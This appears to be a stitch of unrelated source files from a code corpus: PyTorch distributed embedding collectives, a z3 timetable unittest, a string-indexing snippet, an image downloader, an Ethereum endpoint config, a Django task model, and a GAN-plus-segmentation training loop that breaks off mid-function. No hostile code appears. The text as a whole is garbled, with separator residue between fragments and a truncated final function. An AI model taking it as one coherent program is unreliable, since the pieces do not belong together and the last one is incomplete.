group: Optional[dist.ProcessGroup] = None,
) -> Awaitable[Tensor]:
"""
Performs reduce-scatter operation for a pooled embeddings tensor split into world
size number of chunks. The result of the reduce operation gets scattered to all
processes in the group. Then concatenates the received tensors from all processes in
the group and returns a single output tensor.
Args:
inputs (List[Tensor]): list of tensors to scatter, one per rank.
group (Optional[dist.ProcessGroup]): The process group to work on. If None, the
default process group will be used.
Returns:
Async work handle (Awaitable), which can be `wait()` later to get the resulting
tensor.
.. warning::
`reduce_scatter_pooled` is experimental and subject to change.
"""
if group is None:
group = dist.distributed_c10d._get_default_group()
if dist.get_world_size(group) <= 1:
return NoWait(inputs[dist.get_rank(group)])
myreq = Request(group)
rsi = ReduceScatterInfo(input_sizes=[tensor.size() for tensor in inputs])
# pyre-fixme[16]: `ReduceScatter_Req` has no attribute `apply`.
ReduceScatter_Req.apply(group, myreq, rsi, *inputs)
return myreq
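# Hypothetical usage sketch (not part of the original module). `chunks` is assumed to
# contain exactly world_size equally shaped tensors, one destined for each rank; the
# returned tensor is this rank's chunk summed across all ranks.
def _example_reduce_scatter_pooled(chunks: List[Tensor]) -> Tensor:
    awaitable = reduce_scatter_pooled(chunks)
    return awaitable.wait()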
# TODO: improve performance of _recat_pooled_embedding_grad_out and
# recat_pooled_embedding_mixed_dim_grad_out, see T87591139
def _recat_pooled_embedding_grad_out(
grad_output: Tensor, num_features_per_rank: List[int]
) -> Tensor:
"""
TODO: improve performance of _recat_pooled_embedding_grad_out in an
efficient fashion (the .contiguous() calls are extremely expensive).
see T87591139
"""
grad_outputs_by_rank = grad_output.split(num_features_per_rank, dim=1)
return torch.cat(
[
grad_output_by_rank.contiguous().view(-1)
for grad_output_by_rank in grad_outputs_by_rank
],
dim=0,
)
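# Worked example (illustrative only): with num_features_per_rank=[2, 1] and
#   grad_output = [[a0, a1, b0],
#                  [a2, a3, b1]]        # shape (B_local=2, D_global_sum=3)
# the split along dim=1 yields the per-rank blocks [[a0, a1], [a2, a3]] and
# [[b0], [b1]], which are flattened and concatenated into
#   [a0, a1, a2, a3, b0, b1]
# so that each destination rank's slice is contiguous, as all_to_all_single expects.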
def _recat_seq_embedding(
input_embeddings: Tensor,
split_sizes: List[int],
T_local: int,
my_size: int,
forward: bool,
) -> Tensor:
seq_embeddings_by_rank = input_embeddings.split(split_sizes)
if forward:
return torch.cat(
[
seq_embeddings_by_rank[t * my_size + i]
# .contiguous().view(-1)
for i in range(my_size)
for t in range(T_local)
],
dim=0,
)
else:
return torch.cat(
[
seq_embeddings_by_rank[i * T_local + t]
# .contiguous()
# .view(-1)
for t in range(T_local)
for i in range(my_size)
],
dim=0,
)
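# Worked example (illustrative only): with my_size=2 ranks and T_local=3 tables the
# input splits are indexed by (t, i) -> t * my_size + i. The forward recat regroups
# them by rank, emitting chunk order [0, 2, 4, 1, 3, 5]; the backward recat applies
# the inverse permutation [0, 3, 1, 4, 2, 5], restoring the original (t, i) order.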
class All2All_Pooled_Req(Function):
@staticmethod
# pyre-fixme[14]: `forward` overrides method defined in `Function` inconsistently.
def forward(
# pyre-fixme[2]: Parameter must be annotated.
ctx,
pg: dist.ProcessGroup,
myreq: Request[Tensor],
a2ai: All2AllPooledInfo,
input_embeddings: Tensor,
) -> Tensor:
world_size = dist.get_world_size(pg)
if a2ai.mixed_dim:
(B_global, D_local_sum) = input_embeddings.shape
else:
(B_global, T_local, D) = input_embeddings.shape
D_local_sum = T_local * D
a2ai.D = D
dim_sum_per_rank = a2ai.dim_sum_per_rank
B_local = B_global // world_size
a2ai.B_local = B_local
assert (
B_global % world_size == 0
), f"num of ranks {world_size} doesn't divide global batch size {B_global}"
sharded_input_embeddings = input_embeddings.view(
world_size, B_local, D_local_sum
)
D_global_sum = sum(dim_sum_per_rank)
sharded_output_embeddings = torch.empty(
B_local * D_global_sum,
dtype=input_embeddings.dtype,
device=input_embeddings.device,
)
with record_function("## alltoall_fwd_single ##"):
req = dist.all_to_all_single(
output=sharded_output_embeddings,
input=sharded_input_embeddings,
output_split_sizes=[
B_local * D_rank_sum for D_rank_sum in dim_sum_per_rank
],
input_split_sizes=None,
group=pg,
async_op=True,
)
assert (
sum(B_local * D_rank_sum for D_rank_sum in dim_sum_per_rank)
== B_local * D_global_sum
)
myreq.req = req
myreq.tensor = sharded_output_embeddings
myreq.a2ai = a2ai
myreq.wait_function = All2All_Pooled_Wait
ctx.myreq = myreq
ctx.pg = pg
ctx.mixed_dim = a2ai.mixed_dim
return sharded_output_embeddings
@staticmethod
# pyre-fixme[2]: Parameter must be annotated.
# pyre-fixme[2]: Parameter must be annotated.
def backward(ctx, *unused) -> Tuple[None, None, None, Tensor]:
myreq = ctx.myreq
myreq.req.wait()
myreq.req = None
grad_output = myreq.tensor
if ctx.mixed_dim:
(W, B_local, D_local_sum) = grad_output.shape
grad_input = grad_output.view(W * B_local, D_local_sum)
else:
(W, B_local, T_local, D) = grad_output.shape
grad_input = grad_output.view(W * B_local, T_local, D)
if GRADIENT_DIVISION:
grad_input.div_(dist.get_world_size(ctx.pg))
myreq.tensor = None
return (None, None, None, grad_input)
class All2All_Pooled_Wait(Function):
@staticmethod
# pyre-fixme[14]: `forward` overrides method defined in `Function` inconsistently.
def forward(
# pyre-fixme[2]: Parameter must be annotated.
ctx,
pg: dist.ProcessGroup,
myreq: Request[Tensor],
sharded_output_embeddings: Tensor,
) -> Tensor:
a2ai = myreq.a2ai
ctx.a2ai = a2ai
myreq.req.wait()
myreq.req = None
myreq.tensor = None
ctx.pg = pg
ctx.myreq = myreq
dim_sum_per_rank = a2ai.dim_sum_per_rank
B_local = a2ai.B_local
mixed_dim = a2ai.mixed_dim
outputs_by_rank = sharded_output_embeddings.split(
[B_local * D_rank_sum for D_rank_sum in dim_sum_per_rank]
)
if mixed_dim:
result = torch.cat(
[output.view(B_local, -1) for output in outputs_by_rank], dim=1
)
else:
D = a2ai.D
result = torch.cat(
[output.view(B_local, -1, D) for output in outputs_by_rank], dim=1
)
return result
@staticmethod
# pyre-fixme[14]: `backward` overrides method defined in `Function` inconsistently.
# pyre-fixme[2]: Parameter must be annotated.
def backward(ctx, grad_output: Tensor) -> Tuple[None, None, Tensor]:
myreq = ctx.myreq
a2ai = ctx.a2ai
pg = ctx.pg
world_size = dist.get_world_size(pg)
my_rank = dist.get_rank(pg)
dim_sum_per_rank = a2ai.dim_sum_per_rank
D_local_sum = dim_sum_per_rank[my_rank]
if a2ai.mixed_dim:
(B_local, D_global_sum) = grad_output.shape
sharded_grad_input_sizes = (world_size, B_local, D_local_sum)
else:
(B_local, T_global, D) = grad_output.shape
D_global_sum = T_global * D
grad_output = grad_output.view(B_local, -1)
T_local = D_local_sum // D
sharded_grad_input_sizes = (world_size, B_local, T_local, D)
assert sum(dim_sum_per_rank) == D_global_sum
sharded_grad_output = _recat_pooled_embedding_grad_out(
grad_output.contiguous(),
dim_sum_per_rank,
)
sharded_grad_input = torch.empty(
sharded_grad_input_sizes, device=grad_output.device, dtype=grad_output.dtype
)
with record_function("## alltoall_bwd_single ##"):
req = dist.all_to_all_single(
output=sharded_grad_input,
input=sharded_grad_output,
output_split_sizes=None,
input_split_sizes=[
B_local * D_rank_sum for D_rank_sum in dim_sum_per_rank
],
group=pg,
async_op=True,
)
myreq.req = req
myreq.tensor = sharded_grad_input
# Note - this mismatch is by design! We return sharded_grad_output to allow PyTorch shape matching to proceed correctly.
return (None, None, sharded_grad_output)
class All2All_Seq_Req(Function):
@staticmethod
# pyre-fixme[14]: `forward` overrides method defined in `Function` inconsistently.
def forward(
# pyre-fixme[2]: Parameter must be annotated.
ctx,
pg: dist.ProcessGroup,
myreq: Request[Tensor],
a2ai: All2AllSequenceInfo,
sharded_input_embeddings: Tensor,
) -> Tensor:
world_size = dist.get_world_size(pg)
my_rank = dist.get_rank(pg)
D = a2ai.embedding_dim
forward_recat_tensor = a2ai.forward_recat_tensor
lengths_after_sparse_data_all2all = a2ai.lengths_after_sparse_data_all2all * D
input_splits = [i * D for i in a2ai.output_splits]
output_splits = [i * D for i in a2ai.input_splits]
local_T = lengths_after_sparse_data_all2all.shape[0]
if local_T > 0:
with record_function("## alltoall_seq_embedding_fwd_permute ##"):
(
permuted_lengths_after_sparse_data_all2all,
sharded_input_embeddings,
_,
) = torch.ops.fbgemm.permute_sparse_data(
forward_recat_tensor,
lengths_after_sparse_data_all2all.view(local_T * world_size, -1),
sharded_input_embeddings.view(-1),
None,
sharded_input_embeddings.numel(),
)
else:
permuted_lengths_after_sparse_data_all2all = None
sharded_output_embeddings = torch.empty(
sum(output_splits),
dtype=sharded_input_embeddings.dtype,
device=sharded_input_embeddings.device,
)
with record_function("## alltoall_seq_embedding_fwd_single ##"):
req = dist.all_to_all_single(
output=sharded_output_embeddings,
input=sharded_input_embeddings,
output_split_sizes=output_splits,
input_split_sizes=input_splits,
group=pg,
async_op=True,
)
a2ai.permuted_lengths_after_sparse_data_all2all = (
permuted_lengths_after_sparse_data_all2all
)
a2ai.input_splits = input_splits
a2ai.output_splits = output_splits
myreq.req = req
myreq.tensor = sharded_output_embeddings
myreq.a2ai = a2ai
myreq.wait_function = All2All_Seq_Req_Wait
ctx.myreq = myreq
ctx.pg = pg
ctx.my_rank = my_rank
ctx.world_size = world_size
return sharded_output_embeddings
@staticmethod
# pyre-fixme[2]: Parameter must be annotated.
# pyre-fixme[2]: Parameter must be annotated.
def backward(ctx, *unused) -> Tuple[None, None, None, Tensor]:
myreq = ctx.myreq
a2ai = myreq.a2ai
D = a2ai.embedding_dim
backward_recat_tensor = a2ai.backward_recat_tensor
permuted_lengths_after_sparse_data_all2all = (
a2ai.permuted_lengths_after_sparse_data_all2all
)
myreq.req.wait()
sharded_grad_input = myreq.tensor
myreq.req = None
myreq.tensor = None
if permuted_lengths_after_sparse_data_all2all is not None:
with record_function("## alltoall_seq_embedding_bwd_permute ##"):
_, sharded_grad_input, _ = torch.ops.fbgemm.permute_sparse_data(
backward_recat_tensor,
permuted_lengths_after_sparse_data_all2all,
sharded_grad_input,
None,
sharded_grad_input.numel(),
)
return (None, None, None, sharded_grad_input.view(-1, D))
class All2All_Seq_Req_Wait(Function):
@staticmethod
# pyre-fixme[14]: `forward` overrides method defined in `Function` inconsistently.
def forward(
# pyre-fixme[2]: Parameter must be annotated.
ctx,
pg: dist.ProcessGroup,
myreq: Request[Tensor],
sharded_output_embeddings: Tensor,
) -> Tensor:
a2ai = myreq.a2ai
D = a2ai.embedding_dim
ctx.a2ai = a2ai
myreq.req.wait()
myreq.req = None
myreq.tensor = None
ctx.pg = pg
ctx.myreq = myreq
return sharded_output_embeddings.view(-1, D)
@staticmethod
# pyre-fixme[14]: `backward` overrides method defined in `Function` inconsistently.
# pyre-fixme[2]: Parameter must be annotated.
def backward(ctx, sharded_grad_output: Tensor) -> Tuple[None, None, Tensor]:
myreq = ctx.myreq
a2ai = ctx.a2ai
pg = ctx.pg
input_splits = a2ai.output_splits
output_splits = a2ai.input_splits
sharded_grad_input = torch.empty(
sum(output_splits),
device=sharded_grad_output.device,
dtype=sharded_grad_output.dtype,
)
with record_function("## alltoall_seq_embedding_bwd_single ##"):
req = dist.all_to_all_single(
output=sharded_grad_input,
input=sharded_grad_output.view(-1),
output_split_sizes=output_splits,
input_split_sizes=input_splits,
group=pg,
async_op=True,
)
myreq.req = req
myreq.tensor = sharded_grad_input
# Note - this mismatch is by design! We return sharded_grad_output
# to allow PyTorch shape matching to proceed correctly.
return (None, None, sharded_grad_output.view(-1))
class All2Allv_Req(Function):
@staticmethod
# pyre-fixme[14]: `forward` overrides method defined in `Function` inconsistently.
def forward(
# pyre-fixme[2]: Parameter must be annotated.
ctx,
pg: dist.ProcessGroup,
myreq: Request[Tensor],
a2ai: All2AllVInfo,
inputs: List[Tensor],
) -> Tensor:
input_split_sizes = [m * sum(a2ai.D_local_list) for m in a2ai.B_local_list]
output_split_sizes = [a2ai.B_local * e for e in a2ai.dims_sum_per_rank]
input = torch.cat(inputs, dim=1).view([-1])
output = input.new_empty(sum(output_split_sizes))
with record_function("## alltoallv_bwd_single ##"):
req = dist.all_to_all_single(
output,
input,
output_split_sizes,
input_split_sizes,
group=pg,
async_op=True,
)
myreq.req = req
myreq.tensor = output
myreq.wait_function = All2Allv_Wait
a2ai.input_split_sizes = input_split_sizes
a2ai.output_split_sizes = output_split_sizes
myreq.a2ai = a2ai
ctx.a2ai = a2ai
ctx.myreq = myreq
return output
@staticmethod
# pyre-fixme[3]: Return type must be annotated.
# pyre-fixme[2]: Parameter must be annotated.
# pyre-fixme[2]: Parameter must be annotated.
def backward(ctx, *grad_output):
a2ai = ctx.a2ai
myreq = ctx.myreq
myreq.req.wait()
myreq.req = None
grad_input = myreq.tensor
grad_inputs = grad_input.view([a2ai.B_global, -1]).split(
a2ai.D_local_list, dim=1
)
grad_inputs = [gin.contiguous() for gin in grad_inputs]
myreq.tensor = None
return (None, None, None, *grad_inputs)
class All2Allv_Wait(Function):
@staticmethod
# pyre-fixme[14]: `forward` overrides method defined in `Function` inconsistently.
# pyre-fixme[2]: Parameter must be annotated.
def forward(ctx, pg: dist.ProcessGroup, myreq, output) -> Tuple[Tensor]:
a2ai = myreq.a2ai
ctx.a2ai = a2ai
myreq.req.wait()
myreq.req = None
myreq.tensor = None
ctx.pg = pg
ctx.myreq = myreq
outputs = tuple(
[
out.view([a2ai.B_local, -1])
for out in output.split(a2ai.output_split_sizes)
]
)
return outputs
@staticmethod
# pyre-fixme[2]: Parameter must be annotated.
def backward(ctx, *grad_outputs) -> Tuple[None, None, Tensor]:
pg = ctx.pg
myreq = ctx.myreq
a2ai = ctx.a2ai
grad_outputs = [gout.contiguous().view([-1]) for gout in grad_outputs]
grad_output = torch.cat(grad_outputs)
grad_input = grad_output.new_empty([a2ai.B_global * sum(a2ai.D_local_list)])
with record_function("## alltoall_bwd_single ##"):
req = dist.all_to_all_single(
grad_input,
grad_output,
a2ai.input_split_sizes,
a2ai.output_split_sizes,
group=pg,
async_op=True,
)
myreq.req = req
myreq.tensor = grad_input
return (None, None, grad_output)
class ReduceScatter_Req(Function):
@staticmethod
# pyre-fixme[14]: `forward` overrides method defined in `Function` inconsistently.
def forward(
# pyre-fixme[2]: Parameter must be annotated.
ctx,
pg: dist.ProcessGroup,
myreq: Request[Tensor],
rsi: ReduceScatterInfo,
*inputs: Any,
) -> Tensor:
my_rank = dist.get_rank(pg)
output = inputs[my_rank].new_empty(
inputs[my_rank].size(),
dtype=inputs[my_rank].dtype,
device=inputs[my_rank].device,
)
with record_function("## reduce_scatter ##"):
req = dist.reduce_scatter(output, list(inputs), group=pg, async_op=True)
myreq.req = req
myreq.tensor = output
myreq.wait_function = ReduceScatter_Wait
myreq.rsi = rsi
ctx.myreq = myreq
ctx.pg = pg
return output
@staticmethod
# pyre-fixme[2]: Parameter must be annotated.
def backward(ctx, *unused: Tensor) -> Tuple[Optional[Tensor], ...]:
myreq = ctx.myreq
myreq.req.wait()
myreq.req = None
grad_inputs = list(myreq.tensor)
# Make it equivalent to running on a single rank.
if GRADIENT_DIVISION:
for grad_input in grad_inputs:
grad_input.div_(dist.get_world_size(ctx.pg))
myreq.tensor = None
return (None, None, None, *grad_inputs)
class ReduceScatter_Wait(Function):
@staticmethod
# pyre-fixme[14]: `forward` overrides method defined in `Function` inconsistently.
def forward(
# pyre-fixme[2]: Parameter must be annotated.
ctx,
pg: dist.ProcessGroup,
myreq: Request[Tensor],
output: Tensor,
) -> Tensor:
myreq.req.wait()
myreq.req = None
myreq.tensor = None
ctx.myreq = myreq
ctx.pg = pg
return output
@staticmethod
# pyre-fixme[14]: `backward` overrides method defined in `Function` inconsistently.
# pyre-fixme[2]: Parameter must be annotated.
def backward(ctx, grad_output: Tensor) -> Tuple[None, None, Tensor]:
myreq = ctx.myreq
rsi = myreq.rsi
grad_inputs = [
grad_output.new_empty(
in_size,
dtype=grad_output.dtype,
device=grad_output.device,
)
for in_size in rsi.input_sizes
]
with record_function("## reduce_scatter_bw (all_gather) ##"):
req = dist.all_gather(
grad_inputs,
grad_output.contiguous(),
group=ctx.pg,
async_op=True,
)
myreq.req = req
myreq.tensor = grad_inputs
return (None, None, grad_output)
|
StarcoderdataPython
|
113320
|
'''
For semester 1
Experiment to see if randomizing the queries will result in a new timetable
Note that this is not a strict requirement
'''
import unittest
import sys
from z3 import *
sys.path.append('../nusmodsplanner')
import queryParserBV
import querySolverBV
import mod_utils
import random
SEMESTER = 'AY1718S1'
def isScheduleSame(t1, t2):
t1.sort()
t2.sort()
return str(t1) == str(t2)
class TestQueryParserBV(unittest.TestCase):
def setUp(self):
self.calendarUtils = mod_utils.CalendarUtils(SEMESTER)
# def testModUtilsShuffle(self):
# a = self.calendarUtils.queryAndTransform('CS1010');
# # print a
def testisScheduleSame(self):
testSchedule = ['GEQ1000_Tutorial_56', 'CS1010_Sectional Teaching_31',
'CS1010_Tutorial_C04', 'MA1102R_Laboratory_B11',
'MA1102R_Tutorial_T09', 'MA1102R_Lecture_SL1',
'MA1101R_Laboratory_B08', 'MA1101R_Tutorial_T17', 'MA1101R_Lecture_SL1']
self.assertTrue(isScheduleSame(testSchedule, testSchedule))
def testSpecificAndNonSpecificFreedays(self):
''' Verify that timetable contains the specified free day and another soft free day
'''
compMods = ['CS2100', 'CS1010', 'GEQ1000', 'GER1000']
optMods = []
options = {'numFreedays': 2, 'freedays': ['Tuesday']}
timetable1 = querySolverBV.solveQuery(4, compMods, [], options, semester = SEMESTER)
        print(timetable1)
        # random.shuffle(compMods)
        # print(compMods)
        timetable2 = querySolverBV.solveQuery(4, compMods, [], options, semester = SEMESTER)
        print(timetable2)
        print(isScheduleSame(timetable1, timetable2))
if __name__ == '__main__':
unittest.main()
|
StarcoderdataPython
|
3278624
|
<gh_stars>1-10
word = 'tin'
print(word[0])
print(word[1])
print(word[2])
# print(word[3])  # would raise IndexError: 'tin' only has indices 0-2
|
StarcoderdataPython
|
1605170
|
# -*- coding: utf-8 -*-
import io
import uuid
import os
import requests
from PIL import Image
class DownloadImage:
def makeFilename(self, imgUrl):
ext = os.path.splitext(imgUrl)
uniqueid = uuid.uuid1()
filename = str(uniqueid) + ext[1]
path = self.makePath()
return {'re_filename':path['re_path'] +'/'+filename, 'ab_filename' : path['ab_path'] +'/'+filename}
def makePath(self):
        path = os.getcwd() + '/cover'
if not os.path.exists(path):
os.mkdir(path)
return {'re_path':path, 'ab_path':'/cover'}
def download(self, imgUrl):
try:
response = requests.get(imgUrl)
image = Image.open(io.BytesIO(response.content))
file = self.makeFilename(imgUrl)
image.save(file['re_filename'])
return file['ab_filename']
except Exception as err:
            # This can fail here: the image may be unreadable, or saving may raise
            # "cannot write mode RGBA as JPEG"
print(err)
return None
if __name__ == '__main__':
do = DownloadImage()
url = 'http://www.shuquge.com/files/article/image/83/83129/83129s.jpg'
do.download(url)
|
StarcoderdataPython
|
1638376
|
#!/usr/bin/python3
import os
RPC_ETHEREUM_PORT = 8545
RPC_ETHEREUM_HOST = "ethereumgo"
RPC_ENDPOINT = "http://{}:{}".format(RPC_ETHEREUM_HOST, RPC_ETHEREUM_PORT)
if os.getenv("STAGE", "development") != "development":
WS_ETHEREUM_PORT = 8546
else:
WS_ETHEREUM_PORT = 8545
WS_ENDPOINT = "ws://{}:{}".format(RPC_ETHEREUM_HOST, WS_ETHEREUM_PORT)
|
StarcoderdataPython
|
42805
|
<reponame>plumdog/mainstay_kanban<filename>models.py
from django.db import models
from mainstay.models import UpdatedAndCreated
class TaskUsersManager(models.Manager):
def for_user(self, user):
return self.get_queryset().filter(models.Q(user=user) | models.Q(user=None))
class Task(UpdatedAndCreated, models.Model):
name = models.CharField(max_length=200)
content = models.TextField()
user = models.ForeignKey('auth.User', blank=True, null=True)
delegated_by = models.ForeignKey('auth.User', blank=True, null=True, related_name='delegated_tasks')
started_at = models.DateTimeField(blank=True, null=True)
completed_at = models.DateTimeField(blank=True, null=True)
created_at = models.DateTimeField()
updated_at = models.DateTimeField()
objects = TaskUsersManager()
|
StarcoderdataPython
|
1624
|
<gh_stars>1-10
import torch.nn as nn
import torch.optim as optim
import torch.utils.data
from Training import functions
from Training.imresize import imresize
import matplotlib.pyplot as plt
from Models.pix2pixHD_base import GANLoss, VGGLoss
from Models.pix2pixHD2 import mask2onehot
class Losses():
def __init__(self, opt):
self.criterionGAN = GANLoss(not opt.no_lsgan)
self.criterionFeat = nn.L1Loss()
if opt.contour:
self.crossEntropy = nn.BCEWithLogitsLoss()
else:
self.crossEntropy = nn.CrossEntropyLoss()
if not opt.no_vgg_loss:
self.criterionVGG = VGGLoss()
def train_single_scale(dataloader, netD, netG, netS, reals, Gs, Ss, in_s, in_s_S, NoiseAmp, NoiseAmpS, opt):
'''
:param netD: currD
:param netG: currG
:param netS: currS
:param reals: a list of image pyramid ## TODO: you can just pass image shape here
:param Gs: list of prev netG
:param Ss: list of prev netS
:param in_s: 0-> all zero [1, 3, 26, 26]
:param NoiseAmp: [] -> [1]
:param opt: config
:return:
'''
loss = Losses(opt)
real = reals[opt.scale_num] # find the current level image xn
opt.nzx = real[0]
opt.nzy = real[1]
# z_opt = 0 ## dummy z_opt
alpha = opt.alpha
# setup optimizer
optimizerD = optim.Adam(netD.parameters(), lr=opt.lr_d, betas=(opt.beta1, 0.999))
optimizerG = optim.Adam(netG.parameters(), lr=opt.lr_g, betas=(opt.beta1, 0.999))
optimizerS = optim.Adam(netS.parameters(), lr=opt.lr_s, betas=(opt.beta1, 0.999))
schedulerD = torch.optim.lr_scheduler.MultiStepLR(optimizer=optimizerD, milestones=[opt.niter * 0.8], gamma=opt.gamma)
schedulerG = torch.optim.lr_scheduler.MultiStepLR(optimizer=optimizerG, milestones=[opt.niter * 0.8], gamma=opt.gamma)
schedulerS = torch.optim.lr_scheduler.MultiStepLR(optimizer=optimizerS, milestones=[opt.niter * 0.8],
gamma=opt.gamma)
errD2plot = []
errG2plot = []
D_real2plot = []
D_fake2plot = []
for epoch in range(opt.niter): # niter = 2000
if Gs == [] and Ss == []:
noise_ = functions.generate_noise([1, opt.nzx, opt.nzy], opt.batchSize) # [None, 1, 32, 32]
noise_ = noise_.expand(opt.batchSize, 3, opt.nzx, opt.nzy)
## Noise_: for generated false samples through generator
else:
noise_ = functions.generate_noise([1, opt.nzx, opt.nzy], opt.batchSize)
for j, data in enumerate(dataloader):
data['image'] = data['image'].to(opt.device)
data['label'] = data['label'].long().to(opt.device)
############################
# (1) Update D network: maximize D(x) + D(G(z))
###########################
# train with real
netD.zero_grad()
pred_real = netD(data['image'], data['label'][:,0:1,...])
loss_D_real = loss.criterionGAN(pred_real, True)
D_x = loss_D_real.item()
# train with fake
if (j == 0) & (epoch == 0): # first iteration training in this level
if Gs == [] and Ss == []:
prev = torch.full([opt.batchSize, opt.nc_z, opt.nzx, opt.nzy], 0, device=opt.device)
in_s = prev # full of 0 [None, 3, 32, 32]
prev_S = torch.full([opt.batchSize, opt.label_nc, opt.nzx, opt.nzy], 0, device=opt.device)
in_s_S = prev_S # full of 0 [None, 4, 32, 32]
mask = data['label'][:,0:1,...]
opt.noise_amp = opt.noise_amp_init
opt.noise_amp_S = opt.noise_amp_init
else:
prev = draw_concat(Gs, data['down_scale_label'], reals, NoiseAmp, in_s, 'generator', opt)
## given a new noise, prev is a image generated by previous Generator with bilinear upsampling [1, 3, 33, 33]
criterion = nn.MSELoss()
RMSE = torch.sqrt(criterion(data['image'], prev))
opt.noise_amp = opt.noise_amp_init * RMSE
prev_S = draw_concat(Ss, data['down_scale_image'], reals, NoiseAmpS, in_s_S, 'segment', opt) ## prob with [None, 4, 32, 32]
onehot_label = mask2onehot(data['label'][:,0:1,...], opt.label_nc)
RMSE_S = torch.sqrt(criterion(onehot_label, prev_S))
# RMSE_S = 0
opt.noise_amp_S = opt.noise_amp_init * RMSE_S
mask = data['label'][:,0:1,...]
else:
prev = draw_concat(Gs, data['down_scale_label'], reals, NoiseAmp, in_s, 'generator', opt)
prev_S = draw_concat(Ss, data['down_scale_image'], reals, NoiseAmpS, in_s_S, 'segment', opt)
mask = data['label'][:,0:1,...]
if Gs == []:
noise = noise_ ## Gausiaan noise for generating image [None, 3, 42, 42]
else:
noise = opt.noise_amp * noise_ + prev ## [None, 3, 43, 43] new noise is equal to the prev generated image plus the gaussian noise.
fake = netG(noise.detach(), prev, mask) # [None, 3, 32, 32] the same size with the input image
# detach() make sure that the gradients don't go to the noise.
# prev:[None, 3, 42, 42] -> [None, 3, 43, 43] first step prev = 0, second step prev = a image generated by previous Generator with bilinaer upsampling
pred_fake = netD(fake.detach(), data['label'][:,0:1,...]) # output shape [1, 1, 16, 16] -> [1, 1, 23, 23]
# print(len(pred_fake), len(pred_fake[0]))
loss_D_fake = loss.criterionGAN(pred_fake, False)
D_G_z = loss_D_fake.item()
# segment_logit, segment_mask = netS(data['image'], mask2onehot(prev_S, opt.label_nc))
# print(data['image'].shape, onehot.shape)
# print(epoch, j)
segment_logit, segment_prob, segment_mask = netS(data['image'], prev_S.detach())
pred_fake_S = netD(data['image'], segment_prob.detach())
loss_D_fake_S = loss.criterionGAN(pred_fake_S, False)
D_S_z = loss_D_fake_S.item()
errD = (loss_D_real + 0.5 * loss_D_fake + 0.5 * loss_D_fake_S) ## Todo: figure out a proper coefficient
errD.backward()
optimizerD.step()
errD2plot.append(errD.detach()) ## errD for each iteration
############################
# (2) Update G network: maximize D(G(z))
###########################
netG.zero_grad()
pred_fake = netD(fake, data['label'][:,0:1,...])
loss_G_GAN = 0.5 * loss.criterionGAN(pred_fake, True)
# GAN feature matching loss
loss_G_GAN_Feat = 0
if not opt.no_ganFeat_loss:
feat_weights = 4.0 / (opt.n_layers_D + 1)
D_weights = 1.0 / opt.num_D
for i in range(opt.num_D):
for j in range(len(pred_fake[i]) - 1):
loss_G_GAN_Feat += D_weights * feat_weights * \
loss.criterionFeat(pred_fake[i][j],
pred_real[i][j].detach()) * opt.lambda_feat
# VGG feature matching loss
loss_G_VGG = 0
if not opt.no_vgg_loss:
loss_G_VGG = loss.criterionVGG(fake, data['image']) * opt.lambda_feat
## reconstruction loss
if alpha != 0: ## alpha = 10 calculate the reconstruction loss
Recloss = nn.MSELoss()
rec_loss = alpha * Recloss(fake, data['image'])
else:
rec_loss = 0
errG = loss_G_GAN + loss_G_GAN_Feat + loss_G_VGG + rec_loss
errG.backward()
optimizerG.step()
############################
# (3) Update S network: maximize D(S(z))
###########################
netS.zero_grad()
pred_fake_S = netD(data['image'], segment_prob)
loss_G_GAN_S = 0.03 * loss.criterionGAN(pred_fake_S, True)
# Segmentation loss
if opt.contour:
loss_G_Seg = loss.crossEntropy(segment_logit, data['label'].float())
else:
loss_G_Seg = loss.crossEntropy(segment_prob, torch.squeeze(data['label'][:,0:1,...], dim =1))
# GAN feature matching loss
loss_G_GAN_Feat_S = 0
if not opt.no_ganFeat_loss:
feat_weights = 4.0 / (opt.n_layers_D + 1)
D_weights = 1.0 / opt.num_D
for i in range(opt.num_D):
for j in range(len(pred_fake_S[i]) - 1):
loss_G_GAN_Feat_S += D_weights * feat_weights * \
loss.criterionFeat(pred_fake_S[i][j],
pred_real[i][j].detach()) * opt.lambda_feat
errS = loss_G_GAN_S + loss_G_GAN_Feat_S + loss_G_Seg
errS.backward()
optimizerS.step()
## for every epoch, do the following:
errG2plot.append(errG.detach()) ## ErrG for each iteration
D_real2plot.append(D_x) ## discriminator loss on real
D_fake2plot.append(D_G_z + D_S_z) ## discriminator loss on fake
if epoch % 25 == 0 or epoch == (opt.niter - 1):
print('scale %d:[%d/%d]' % (opt.scale_num, epoch, opt.niter))
if epoch % 25 == 0 or epoch == (opt.niter - 1):
plt.imsave('%s/fake_sample_%d.png' % (opt.outf, epoch),
functions.convert_image_np(fake.detach()), vmin=0, vmax=1)
plt.imsave('%s/fake_sample_real_%d.png' % (opt.outf, epoch),
functions.convert_image_np(data['image']), vmin=0, vmax=1)
plt.imsave('%s/fake_sample_mask_%d.png' % (opt.outf, epoch),
functions.convert_mask_np(data['label'][:,0:1,...], num_classes= opt.label_nc))
plt.imsave('%s/segmentation_mask_%d.png' % (opt.outf, epoch),
functions.convert_mask_np(segment_mask.detach(), num_classes=opt.label_nc))
schedulerD.step()
schedulerG.step()
schedulerS.step()
functions.save_networks(netG, netD, netS, opt) ## save netG, netD, z_opt, opt is used to parser output path
return in_s, in_s_S, netG, netS
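# Hypothetical outer-loop sketch (not part of the original file) showing how
# train_single_scale is typically chained across scales in a SinGAN-style pyramid.
# `init_models`, `dataloader`, and `opt.stop_scale` are assumptions for illustration.
#
#   Gs, Ss, NoiseAmp, NoiseAmpS = [], [], [], []
#   in_s, in_s_S = 0, 0
#   for opt.scale_num in range(opt.stop_scale + 1):
#       netD, netG, netS = init_models(opt)
#       in_s, in_s_S, netG, netS = train_single_scale(
#           dataloader, netD, netG, netS, reals, Gs, Ss, in_s, in_s_S,
#           NoiseAmp, NoiseAmpS, opt)
#       Gs.append(netG)
#       Ss.append(netS)
#       NoiseAmp.append(opt.noise_amp)
#       NoiseAmpS.append(opt.noise_amp_S)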
def draw_concat(Gs, masks, reals, NoiseAmp, in_s, mode, opt):
'''
:param Gs: [G0]
:param mask: [down scaled _mask]
:param reals: [image pyramid] only used to represent the image shape
:param NoiseAmp: [1]
:param in_s: all zeros [1, 3, 26, 26]
:param mode: 'rand'
:param opt:
:return:
'''
G_z = in_s[:opt.batchSize, :, :, :] # [None, 3, 26, 26] all zeros, image input for the corest level
if len(Gs) > 0:
if mode == 'generator':
count = 0
for G, mask, real_curr, real_next, noise_amp in zip(Gs, masks, reals, reals[1:], NoiseAmp):
if count == 0:
z = functions.generate_noise([1, real_curr[0], real_curr[1]],
opt.batchSize)
z = z.expand(opt.batchSize, G_z.shape[1], z.shape[2], z.shape[3])
else:
